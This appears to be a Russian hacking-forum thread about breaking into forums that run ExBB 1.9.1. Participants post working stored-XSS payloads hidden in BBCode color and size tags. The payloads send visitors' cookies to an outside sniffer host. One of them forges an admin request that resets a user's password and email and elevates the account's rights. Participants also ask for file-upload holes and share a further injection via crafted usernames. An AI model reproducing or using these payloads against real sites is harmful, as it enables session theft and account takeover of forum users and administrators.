Адрес сниффера: http://antichat.ru/cgi-bin/s.jpg XSS в каждом теге </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">[color='z=]'style='background:url(javascript:document.images[0].src="http://localhost/1.php?"+document.cookie)'[/color] [size='z="]"style='background:url(javascript:document.images[0].src="http://localhost/1.php?"+document.cookie)'[/size] 'z="style='background:url(javascrip.../g,String.fromCharCode(47))+document.cookie)' http://video.antichat.ru/videos/zfailure/exbb_191.rar
Всё хорошо, но это не то. Мне нужна возможность залития файлов на сервер через админку или другой любой способ. А XBB стандартно - ">
zFailure Не мог бы сказать этот баг уже прикрыли? а то отсылаю вот этот код Code: [size='z="]"style='background:url(javascript:document.images[0].src="http://antichat.ru/cgi-bin/s.jpg?video___"+document.cookie)'[/size] [size='z="]"style='background:url(javascript:document.images[0].src="http://forum.k*****h.com/setmembers.php?action=edit_user&checkaction=yes&userid=45&membertitle=&[email protected]&newname=Коля&password=111111&homepage=&aolname=&icqnumber=&location=&interests=&signature=&numberofposts=0&avatar=noavatar.gif&membercode=ad&submit=%CE%F2%EF%F0%E0%E2%E8%F2%FC")'[/size] а там тишина и пустота
кто нить может ответить на вопрос есть лиш ещё какие нить баги или дырки или хоть какие нить ещё зацепки на взлом форума Powered by ExBB 1.9.1 или все он стал самым надежным и без бажным форумоммМММ!!!!!
Кста во я тут кое-что заметил по поводу ExBB 1.9.1. В просмотре топа мона добавлять имя юзера кликнув по линку Code: <a href="javascript:pasteN<a href="javascript:pasteN('UserName')"><b>UserName</b></a> , мона зарегистрировать например такой ник Code: ');alert(document.cookie+' и при клике будет алерт с куками, несмотря на то, что ' заменяются на & #39; дык вот чуствую это как-то мона обыграть, но пока не знаю как
